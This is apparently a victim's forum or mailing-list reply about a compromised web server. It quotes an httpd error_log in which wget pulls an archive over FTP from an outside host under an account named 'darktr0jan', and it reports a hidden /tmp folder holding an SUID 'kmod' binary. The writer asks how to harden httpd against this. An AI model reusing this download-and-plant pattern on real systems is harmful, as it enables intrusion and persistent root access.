Thanks Ryan,
I looked in the httpd error_log and found numerous entries like this :
--21:54:38--
ftp://darktr0jan:*password*@gate.pol.../neon20.tar.gz
=> `neon20.tar.gz.59'
Resolving gate.polarhome.com... done.
Connecting to gate.polarhome.com[81.216.198.11]:21... connected.
Logging in as darktr0jan ... Logged in!
==> SYST ... done. ==> PWD ... done.
==> TYPE I ... done. ==> CWD /bandy ... done.
==> PORT ... done. ==> RETR neon20.tar.gz ... done.
Length: 26,405 (unauthoritative)
0K .......... .......... ..... 100% 7.13 KB/s
21:54:56 (7.13 KB/s) - `neon20.tar.gz.59' saved [26405]
...and found the corresponding file in /tmp. Also in /tmp there was a hidden folder called .f containing a 'kmod' executable with SUID permissions. So I guess that was it ...
But I would really like to prevent httpd from allowing people to do this kind of stuff !
thanks
Abe